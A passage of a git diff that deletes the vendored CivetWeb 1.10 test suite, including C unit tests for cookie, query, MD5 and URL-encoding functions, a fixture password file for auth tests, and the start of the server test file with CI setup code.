-	suite_add_tcase(suite, tcase_helper_funcs);
-
-	return suite;
-}
-#endif
diff --git a/thirdparty/civetweb-1.10/test/private_exe.h b/thirdparty/civetweb-1.10/test/private_exe.h
deleted file mode 100644
index 5e8e9bf..0000000
--- a/thirdparty/civetweb-1.10/test/private_exe.h
+++ /dev/null
@@ -1,31 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_PRIVATE_EXE_H_
-#define TEST_PRIVATE_EXE_H_
-
-#include "civetweb_check.h"
-
-Suite *make_private_exe_suite(void);
-
-/* This is a redefine for "main" in main.c */
-int exe_main(int argc, char *argv[]);
-
-#endif /* TEST_PRIVATE_H_ */
diff --git a/thirdparty/civetweb-1.10/test/protected/.htpasswd b/thirdparty/civetweb-1.10/test/protected/.htpasswd
deleted file mode 100644
index 5686ad3..0000000
--- a/thirdparty/civetweb-1.10/test/protected/.htpasswd
+++ /dev/null
@@ -1 +0,0 @@
-user:mydomain.com:1aeed57ec85c6126e335a54789c2ecfa
diff --git a/thirdparty/civetweb-1.10/test/protected/content.txt b/thirdparty/civetweb-1.10/test/protected/content.txt
deleted file mode 100644
index 0bcd51a..0000000
--- a/thirdparty/civetweb-1.10/test/protected/content.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-Protected directory.
-
-username: user
-password: pass
-
diff --git a/thirdparty/civetweb-1.10/test/public_func.c b/thirdparty/civetweb-1.10/test/public_func.c
deleted file mode 100644
index deb3dd5..0000000
--- a/thirdparty/civetweb-1.10/test/public_func.c
+++ /dev/null
@@ -1,546 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers

- *

- * Permission is hereby granted, free of charge, to any person obtaining a copy

- * of this software and associated documentation files (the "Software"), to deal

- * in the Software without restriction, including without limitation the rights

- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell

- * copies of the Software, and to permit persons to whom the Software is

- * furnished to do so, subject to the following conditions:

- *

- * The above copyright notice and this permission notice shall be included in

- * all copies or substantial portions of the Software.

- *

- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR

- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,

- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE

- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER

- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,

- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN

- * THE SOFTWARE.

- */

-

-#ifdef _MSC_VER

-#ifndef _CRT_SECURE_NO_WARNINGS

-#define _CRT_SECURE_NO_WARNINGS

-#endif

-#endif

-

-#include <stdlib.h>

-#include <stdio.h>

-

-#include "public_func.h"

-#include <civetweb.h>

-

-/* This unit test file uses the excellent Check unit testing library.

- * The API documentation is available here:

- * http://check.sourceforge.net/doc/check_html/index.html

- */

-

-START_TEST(test_mg_version)

-{

-	const char *ver = mg_version();

-	unsigned major = 0, minor = 0;

-	unsigned feature_files, feature_https, feature_cgi, feature_ipv6,

-	    feature_websocket, feature_lua, feature_duktape, feature_caching;

-	unsigned expect_files = 0, expect_https = 0, expect_cgi = 0,

-	         expect_ipv6 = 0, expect_websocket = 0, expect_lua = 0,

-	         expect_duktape = 0, expect_caching = 0;

-	int ret, len;

-	char *buf;

-

-	ck_assert(ver != NULL);

-	ck_assert_str_eq(ver, CIVETWEB_VERSION);

-

-	/* check structure of version string */

-	ret = sscanf(ver, "%u.%u", &major, &minor);

-	ck_assert_int_eq(ret, 2);

-	ck_assert_uint_ge(major, 1);

-	if (major == 1) {

-		ck_assert_uint_ge(minor, 8); /* current version is 1.8 */

-	}

-

-	/* check feature */

-	feature_files = mg_check_feature(1);

-	feature_https = mg_check_feature(2);

-	feature_cgi = mg_check_feature(4);

-	feature_ipv6 = mg_check_feature(8);

-	feature_websocket = mg_check_feature(16);

-	feature_lua = mg_check_feature(32);

-	feature_duktape = mg_check_feature(64);

-	feature_caching = mg_check_feature(128);

-

-#if !defined(NO_FILES)

-	expect_files = 1;

-#endif

-#if !defined(NO_SSL)

-	expect_https = 1;

-#endif

-#if !defined(NO_CGI)

-	expect_cgi = 1;

-#endif

-#if defined(USE_IPV6)

-	expect_ipv6 = 1;

-#endif

-#if defined(USE_WEBSOCKET)

-	expect_websocket = 1;

-#endif

-#if defined(USE_LUA)

-	expect_lua = 1;

-#endif

-#if defined(USE_DUKTAPE)

-	expect_duktape = 1;

-#endif

-#if !defined(NO_CACHING)

-	expect_caching = 1;

-#endif

-

-	ck_assert_uint_eq(expect_files, !!feature_files);

-	ck_assert_uint_eq(expect_https, !!feature_https);

-	ck_assert_uint_eq(expect_cgi, !!feature_cgi);

-	ck_assert_uint_eq(expect_ipv6, !!feature_ipv6);

-	ck_assert_uint_eq(expect_websocket, !!feature_websocket);

-	ck_assert_uint_eq(expect_lua, !!feature_lua);

-	ck_assert_uint_eq(expect_duktape, !!feature_duktape);

-	ck_assert_uint_eq(expect_caching, !!feature_caching);

-

-	/* get system information */

-	len = mg_get_system_info(NULL, 0);

-	ck_assert_int_gt(len, 0);

-	buf = (char *)malloc((unsigned)len + 1);

-	ck_assert_ptr_ne(buf, NULL);

-	ret = mg_get_system_info(buf, len + 1);

-	ck_assert_int_eq(len, ret);

-	ret = (int)strlen(buf);

-	ck_assert_int_eq(len, ret);

-	free(buf);

-}

-END_TEST

-

-

-START_TEST(test_mg_get_valid_options)

-{

-	int i;

-	const struct mg_option *default_options = mg_get_valid_options();

-

-	ck_assert(default_options != NULL);

-

-	for (i = 0; default_options[i].name != NULL; i++) {

-		ck_assert(default_options[i].name != NULL);

-		ck_assert(strlen(default_options[i].name) > 0);

-		ck_assert(((int)default_options[i].type) > 0);

-	}

-

-	ck_assert(i > 0);

-}

-END_TEST

-

-

-START_TEST(test_mg_get_builtin_mime_type)

-{

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.txt"), "text/plain");

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.html"), "text/html");

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.HTML"), "text/html");

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.hTmL"), "text/html");

-	ck_assert_str_eq(mg_get_builtin_mime_type("/abc/def/ghi.htm"), "text/html");

-	ck_assert_str_eq(mg_get_builtin_mime_type("x.unknown_extention_xyz"),

-	                 "text/plain");

-}

-END_TEST

-

-

-START_TEST(test_mg_strncasecmp)

-{

-	ck_assert(mg_strncasecmp("abc", "abc", 3) == 0);

-	ck_assert(mg_strncasecmp("abc", "abcd", 3) == 0);

-	ck_assert(mg_strncasecmp("abc", "abcd", 4) != 0);

-	ck_assert(mg_strncasecmp("a", "A", 1) == 0);

-

-	ck_assert(mg_strncasecmp("A", "B", 1) < 0);

-	ck_assert(mg_strncasecmp("A", "b", 1) < 0);

-	ck_assert(mg_strncasecmp("a", "B", 1) < 0);

-	ck_assert(mg_strncasecmp("a", "b", 1) < 0);

-	ck_assert(mg_strncasecmp("b", "A", 1) > 0);

-	ck_assert(mg_strncasecmp("B", "A", 1) > 0);

-	ck_assert(mg_strncasecmp("b", "a", 1) > 0);

-	ck_assert(mg_strncasecmp("B", "a", 1) > 0);

-

-	ck_assert(mg_strncasecmp("xAx", "xBx", 3) < 0);

-	ck_assert(mg_strncasecmp("xAx", "xbx", 3) < 0);

-	ck_assert(mg_strncasecmp("xax", "xBx", 3) < 0);

-	ck_assert(mg_strncasecmp("xax", "xbx", 3) < 0);

-	ck_assert(mg_strncasecmp("xbx", "xAx", 3) > 0);

-	ck_assert(mg_strncasecmp("xBx", "xAx", 3) > 0);

-	ck_assert(mg_strncasecmp("xbx", "xax", 3) > 0);

-	ck_assert(mg_strncasecmp("xBx", "xax", 3) > 0);

-}

-END_TEST

-

-

-START_TEST(test_mg_get_cookie)

-{

-	char buf[32];

-	int ret;

-	const char *longcookie = "key1=1; key2=2; key3; key4=4; key5=; key6; "

-	                         "key7=this+is+it; key8=8; key9";

-

-	/* invalid result buffer */

-	ret = mg_get_cookie("", "notfound", NULL, 999);

-	ck_assert_int_eq(ret, -2);

-

-	/* zero size result buffer */

-	ret = mg_get_cookie("", "notfound", buf, 0);

-	ck_assert_int_eq(ret, -2);

-

-	/* too small result buffer */

-	ret = mg_get_cookie("key=toooooooooolong", "key", buf, 4);

-	ck_assert_int_eq(ret, -3);

-

-	/* key not found in string */

-	ret = mg_get_cookie("", "notfound", buf, sizeof(buf));

-	ck_assert_int_eq(ret, -1);

-

-	ret = mg_get_cookie(longcookie, "notfound", buf, sizeof(buf));

-	ck_assert_int_eq(ret, -1);

-

-	/* key not found in string */

-	ret = mg_get_cookie("key1=1; key2=2; key3=3", "notfound", buf, sizeof(buf));

-	ck_assert_int_eq(ret, -1);

-

-	/* keys are found as first, middle and last key */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie("key1=1; key2=2; key3=3", "key1", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("1", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie("key1=1; key2=2; key3=3", "key2", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("2", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie("key1=1; key2=2; key3=3", "key3", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("3", buf);

-

-	/* longer value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie(longcookie, "key7", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 10);

-	ck_assert_str_eq("this+is+it", buf);

-

-	/* key with = but without value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie(longcookie, "key5", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 0);

-	ck_assert_str_eq("", buf);

-

-	/* key without = and without value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_cookie(longcookie, "key6", buf, sizeof(buf));

-	ck_assert_int_eq(ret, -1);

-	/* TODO: mg_get_cookie and mg_get_var(2) should have the same behavior */

-}

-END_TEST

-

-

-START_TEST(test_mg_get_var)

-{

-	char buf[32];

-	int ret;

-	const char *shortquery = "key1=1&key2=2&key3=3";

-	const char *longquery = "key1=1&key2=2&key3&key4=4&key5=&key6&"

-	                        "key7=this+is+it&key8=8&key9&&key10=&&"

-	                        "key7=that+is+it&key12=12";

-

-	/* invalid result buffer */

-	ret = mg_get_var2("", 0, "notfound", NULL, 999, 0);

-	ck_assert_int_eq(ret, -2);

-

-	/* zero size result buffer */

-	ret = mg_get_var2("", 0, "notfound", buf, 0, 0);

-	ck_assert_int_eq(ret, -2);

-

-	/* too small result buffer */

-	ret = mg_get_var2("key=toooooooooolong", 19, "key", buf, 4, 0);

-	/* ck_assert_int_eq(ret, -3);

-	   --> TODO: mg_get_cookie returns -3, mg_get_var -2. This should be

-	   unified. */

-	ck_assert(ret < 0);

-

-	/* key not found in string */

-	ret = mg_get_var2("", 0, "notfound", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, -1);

-

-	ret = mg_get_var2(

-	    longquery, strlen(longquery), "notfound", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, -1);

-

-	/* key not found in string */

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "notfound", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, -1);

-

-	/* key not found in string */

-	ret = mg_get_var2("key1=1&key2=2&key3=3&notfound=here",

-	                  strlen(shortquery),

-	                  "notfound",

-	                  buf,

-	                  sizeof(buf),

-	                  0);

-	ck_assert_int_eq(ret, -1);

-

-	/* key not found in string */

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "key1", buf, sizeof(buf), 1);

-	ck_assert_int_eq(ret, -1);

-

-	/* keys are found as first, middle and last key */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "key1", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("1", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "key2", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("2", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_var2(

-	    shortquery, strlen(shortquery), "key3", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("3", buf);

-

-	/* mg_get_var call mg_get_var2 with last argument 0 */

-	memset(buf, 77, sizeof(buf));

-	ret = mg_get_var(shortquery, strlen(shortquery), "key1", buf, sizeof(buf));

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq("1", buf);

-

-	/* longer value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret =

-	    mg_get_var2(longquery, strlen(longquery), "key7", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 10);

-	ck_assert_str_eq("this is it", buf);

-

-	/* longer value in the middle of a longer string - seccond occurance of key

-	 */

-	memset(buf, 77, sizeof(buf));

-	ret =

-	    mg_get_var2(longquery, strlen(longquery), "key7", buf, sizeof(buf), 1);

-	ck_assert_int_eq(ret, 10);

-	ck_assert_str_eq("that is it", buf);

-

-	/* key with = but without value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret =

-	    mg_get_var2(longquery, strlen(longquery), "key5", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 0);

-	ck_assert_str_eq(buf, "");

-

-	/* key without = and without value in the middle of a longer string */

-	memset(buf, 77, sizeof(buf));

-	ret =

-	    mg_get_var2(longquery, strlen(longquery), "key6", buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, -1);

-	ck_assert_str_eq(buf, "");

-	/* TODO: this is the same situation as with mg_get_value */

-}

-END_TEST

-

-

-START_TEST(test_mg_md5)

-{

-	char buf[33];

-	char *ret;

-	const char *long_str =

-	    "_123456789A123456789B123456789C123456789D123456789E123456789F123456789"

-	    "G123456789H123456789I123456789J123456789K123456789L123456789M123456789"

-	    "N123456789O123456789P123456789Q123456789R123456789S123456789T123456789"

-	    "U123456789V123456789W123456789X123456789Y123456789Z";

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf, NULL);

-	ck_assert_str_eq(buf, "d41d8cd98f00b204e9800998ecf8427e");

-	ck_assert_str_eq(ret, "d41d8cd98f00b204e9800998ecf8427e");

-	ck_assert_ptr_eq(ret, buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf, "The quick brown fox jumps over the lazy dog.", NULL);

-	ck_assert_str_eq(buf, "e4d909c290d0fb1ca068ffaddf22cbd0");

-	ck_assert_str_eq(ret, "e4d909c290d0fb1ca068ffaddf22cbd0");

-	ck_assert_ptr_eq(ret, buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf,

-	             "",

-	             "The qu",

-	             "ick bro",

-	             "",

-	             "wn fox ju",

-	             "m",

-	             "ps over the la",

-	             "",

-	             "",

-	             "zy dog.",

-	             "",

-	             NULL);

-	ck_assert_str_eq(buf, "e4d909c290d0fb1ca068ffaddf22cbd0");

-	ck_assert_str_eq(ret, "e4d909c290d0fb1ca068ffaddf22cbd0");

-	ck_assert_ptr_eq(ret, buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf, long_str, NULL);

-	ck_assert_str_eq(buf, "1cb13cf9f16427807f081b2138241f08");

-	ck_assert_str_eq(ret, "1cb13cf9f16427807f081b2138241f08");

-	ck_assert_ptr_eq(ret, buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_md5(buf, long_str + 1, NULL);

-	ck_assert_str_eq(buf, "cf62d3264334154f5779d3694cc5093f");

-	ck_assert_str_eq(ret, "cf62d3264334154f5779d3694cc5093f");

-	ck_assert_ptr_eq(ret, buf);

-}

-END_TEST

-

-

-START_TEST(test_mg_url_encode)

-{

-	char buf[20];

-	int ret;

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_url_encode("abc", buf, sizeof(buf));

-	ck_assert_int_eq(3, ret);

-	ck_assert_str_eq("abc", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_url_encode("a%b/c&d.e", buf, sizeof(buf));

-	ck_assert_int_eq(15, ret);

-	ck_assert_str_eq("a%25b%2fc%26d.e", buf);

-

-	memset(buf, 77, sizeof(buf));

-	ret = mg_url_encode("%%%", buf, 4);

-	ck_assert_int_eq(-1, ret);

-	ck_assert_str_eq("%25", buf);

-}

-END_TEST

-

-

-START_TEST(test_mg_url_decode)

-{

-	char buf[20];

-	int ret;

-

-	ret = mg_url_decode("abc", 3, buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 3);

-	ck_assert_str_eq(buf, "abc");

-

-	ret = mg_url_decode("abcdef", 3, buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 3);

-	ck_assert_str_eq(buf, "abc");

-

-	ret = mg_url_decode("x+y", 3, buf, sizeof(buf), 0);

-	ck_assert_int_eq(ret, 3);

-	ck_assert_str_eq(buf, "x+y");

-

-	ret = mg_url_decode("x+y", 3, buf, sizeof(buf), 1);

-	ck_assert_int_eq(ret, 3);

-	ck_assert_str_eq(buf, "x y");

-

-	ret = mg_url_decode("%25", 3, buf, sizeof(buf), 1);

-	ck_assert_int_eq(ret, 1);

-	ck_assert_str_eq(buf, "%");

-}

-END_TEST

-

-

-START_TEST(test_mg_get_response_code_text)

-{

-	int i;

-	size_t j, len;

-	const char *resp;

-

-	for (i = 100; i < 600; i++) {

-		resp = mg_get_response_code_text(NULL, i);

-		ck_assert_ptr_ne(resp, NULL);

-		len = strlen(resp);

-		ck_assert_uint_gt(len, 1);

-		ck_assert_uint_lt(len, 32);

-		for (j = 0; j < len; j++) {

-			if (resp[j] == ' ') {

-				/* space is valid */

-			} else if (resp[j] == '-') {

-				/* hyphen is valid */

-			} else if (resp[j] >= 'A' && resp[j] <= 'Z') {

-				/* A-Z is valid */

-			} else if (resp[j] >= 'a' && resp[j] <= 'z') {

-				/* a-z is valid */

-			} else {

-				ck_abort_msg("Found letter %c (%02xh) in %s",

-				             resp[j],

-				             resp[j],

-				             resp);

-			}

-		}

-	}

-}

-END_TEST

-

-

-#if !defined(REPLACE_CHECK_FOR_LOCAL_DEBUGGING)

-Suite *

-make_public_func_suite(void)

-{

-	Suite *const suite = suite_create("PublicFunc");

-

-	TCase *const tcase_version = tcase_create("Version");

-	TCase *const tcase_get_valid_options = tcase_create("Options");

-	TCase *const tcase_get_builtin_mime_type = tcase_create("MIME types");

-	TCase *const tcase_strncasecmp = tcase_create("strcasecmp");

-	TCase *const tcase_urlencodingdecoding =

-	    tcase_create("URL encoding decoding");

-	TCase *const tcase_cookies = tcase_create("Cookies and variables");

-	TCase *const tcase_md5 = tcase_create("MD5");

-	TCase *const tcase_aux = tcase_create("Aux functions");

-

-	tcase_add_test(tcase_version, test_mg_version);

-	tcase_set_timeout(tcase_version, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_version);

-

-	tcase_add_test(tcase_get_valid_options, test_mg_get_valid_options);

-	tcase_set_timeout(tcase_get_valid_options, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_get_valid_options);

-

-	tcase_add_test(tcase_get_builtin_mime_type, test_mg_get_builtin_mime_type);

-	tcase_set_timeout(tcase_get_builtin_mime_type, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_get_builtin_mime_type);

-

-	tcase_add_test(tcase_strncasecmp, test_mg_strncasecmp);

-	tcase_set_timeout(tcase_strncasecmp, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_strncasecmp);

-

-	tcase_add_test(tcase_urlencodingdecoding, test_mg_url_encode);

-	tcase_add_test(tcase_urlencodingdecoding, test_mg_url_decode);

-	tcase_set_timeout(tcase_urlencodingdecoding, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_urlencodingdecoding);

-

-	tcase_add_test(tcase_cookies, test_mg_get_cookie);

-	tcase_add_test(tcase_cookies, test_mg_get_var);

-	tcase_set_timeout(tcase_cookies, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_cookies);

-

-	tcase_add_test(tcase_md5, test_mg_md5);

-	tcase_set_timeout(tcase_md5, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_md5);

-

-	tcase_add_test(tcase_aux, test_mg_get_response_code_text);

-	tcase_set_timeout(tcase_aux, civetweb_min_test_timeout);

-	suite_add_tcase(suite, tcase_aux);

-

-	return suite;

-}

-#endif

diff --git a/thirdparty/civetweb-1.10/test/public_func.h b/thirdparty/civetweb-1.10/test/public_func.h
deleted file mode 100644
index e214083..0000000
--- a/thirdparty/civetweb-1.10/test/public_func.h
+++ /dev/null
@@ -1,28 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-#ifndef TEST_PUBLIC_FUNC_H_
-#define TEST_PUBLIC_FUNC_H_
-
-#include "civetweb_check.h"
-
-Suite *make_public_func_suite(void);
-
-#endif /* TEST_PUBLIC_H_ */
diff --git a/thirdparty/civetweb-1.10/test/public_server.c b/thirdparty/civetweb-1.10/test/public_server.c
deleted file mode 100644
index b080ac2..0000000
--- a/thirdparty/civetweb-1.10/test/public_server.c
+++ /dev/null
@@ -1,4953 +0,0 @@
-/* Copyright (c) 2015-2017 the Civetweb developers
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#ifdef _MSC_VER
-#ifndef _CRT_SECURE_NO_WARNINGS
-#define _CRT_SECURE_NO_WARNINGS
-#endif
-#endif
-
-#include <stdlib.h>
-#include <stdio.h>
-#include <stdarg.h>
-#include <string.h>
-#include <stdint.h>
-#include <time.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-
-#include "public_server.h"
-#include <civetweb.h>
-
-#if defined(_WIN32)
-#include <windows.h>
-#define test_sleep(x) (Sleep((x)*1000))
-#else
-#include <unistd.h>
-#define test_sleep(x) (sleep(x))
-#endif
-
-#define SLEEP_BEFORE_MG_START (1)
-#define SLEEP_AFTER_MG_START (3)
-#define SLEEP_BEFORE_MG_STOP (1)
-#define SLEEP_AFTER_MG_STOP (5)
-
-/* This unit test file uses the excellent Check unit testing library.
- * The API documentation is available here:
- * http://check.sourceforge.net/doc/check_html/index.html
- */
-
-#if defined(__MINGW32__) || defined(__GNUC__)
-/* Return codes of the tested functions are evaluated. Checking all other
- * functions, used only to prepare the test environment seems redundant.
- * If they fail, the test fails anyway. */
-#pragma GCC diagnostic ignored "-Wunused-result"
-#endif
-
-static const char *
-locate_path(const char *a_path)
-{
-	static char r_path[256];
-
-#ifdef _WIN32
-#ifdef LOCAL_TEST
-	sprintf(r_path, "%s\\", a_path);
-#else
-	/* Appveyor */
-	sprintf(r_path, "..\\..\\..\\%s\\", a_path);
-/* TODO: the different paths
- * used in the different test
- * system is an unsolved
- * problem. */
-#endif
-#else
-#ifdef LOCAL_TEST
-	sprintf(r_path, "%s/", a_path);
-#else
-	/* Travis */
-	sprintf(r_path,
-	        "../../%s/",
-	        a_path); // TODO: fix path in CI test environment
-#endif
-#endif
-
-	return r_path;
-}
-
-
-#define locate_resources() locate_path("resources")
-#define locate_test_exes() locate_path("output")
-
-
-static const char *
-locate_ssl_cert(void)
-{
-	static char cert_path[256];
-	const char *res = locate_resources();
-	size_t l;
-
-	ck_assert(res != NULL);
-	l = strlen(res);
-	ck_assert_uint_gt(l, 0);
-	ck_assert_uint_lt(l, 100); /* assume there is enough space left in our
-	                              typical 255 character string buffers */
-
-	strcpy(cert_path, res);
-	strcat(cert_path, "ssl_cert.pem");
-	return cert_path;
-}
-
-
-static int
-wait_not_null(void *volatile *data)
-{
-	int i;
-	for (i = 0; i < 100; i++) {
-		mark_point();
-		test_sleep(1);
-
-		if (*data != NULL) {
-			mark_point();
-			return 1;
-		}
-	}
-
-#if defined(__MINGW32__) || defined(__GNUC__)
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunreachable-code"
-#pragma GCC diagnostic ignored "-Wunreachable-code-return"
-#endif
-
-	ck_abort_msg("wait_not_null failed (%i sec)", i);
-
-	return 0;
-
-#if defined(__MINGW32__) || defined(__GNUC__)
-#pragma GCC diagnostic pop
-#endif
-}
-
-
-START_TEST(test_the_test_environment)
-{
-	char wd[300];
-	char buf[500];
-	FILE *f;
-	struct stat st;
-	int ret;
-	const char *ssl_cert = locate_ssl_cert();
-
-	memset(wd, 0, sizeof(wd));
-	memset(buf, 0, sizeof(buf));
-
-/* Get the current working directory */
-#ifdef _WIN32
-	(void)GetCurrentDirectoryA(sizeof(wd), wd);
-	wd[sizeof(wd) - 1] = 0;
-#else
-	(void)getcwd(wd, sizeof(wd));
-	wd[sizeof(wd) - 1] = 0;
-#endif
-
-/* Check the pem file */
-#ifdef _WIN32
-	strcpy(buf, wd);
-	strcat(buf, "\\");
-	strcat(buf, ssl_cert);
-	f = fopen(buf, "rb");
-#else
-	strcpy(buf, wd);
-	strcat(buf, "/");
-	strcat(buf, ssl_cert);
-	f = fopen(buf, "r");
-#endif
-
-	if (f) {
-		fclose(f);
-	} else {
-		fprintf(stderr, "%s not found", buf);
-	}
-
-/* Check the test dir */
-#ifdef _WIN32
-	strcpy(buf, wd);
-	strcat(buf, "\\test");
-#else
-	strcpy(buf, wd);
-	strcat(buf, "/test");
-#endif
-
-	memset(&st, 0, sizeof(st));
-	ret = stat(buf, &st);
-
-	if (ret) {
-		fprintf(stderr, "%s not found", buf);
-	}
-
-
-#ifdef _WIN32
-/* Try to copy the files required for AppVeyor */
-#if defined(_WIN64) || defined(__MINGW64__)
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\libeay32.dll libeay32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\libssl32.dll libssl32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\ssleay32.dll ssleay32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\libeay32.dll libeay64.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\libssl32.dll libssl64.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win64\\ssleay32.dll ssleay64.dll");
-#else
-	(void)system("cmd /c copy C:\\OpenSSL-Win32\\libeay32.dll libeay32.dll");
-	(void)system("cmd /c copy C:\\OpenSSL-Win32\\libssl32.dll libssl32.dll");
